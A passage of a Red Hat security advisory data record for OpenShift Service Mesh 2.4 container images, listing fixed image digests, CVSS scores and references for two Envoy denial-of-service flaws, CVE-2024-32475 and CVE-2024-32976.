"openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, ], }, vulnerabilities: [ { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", 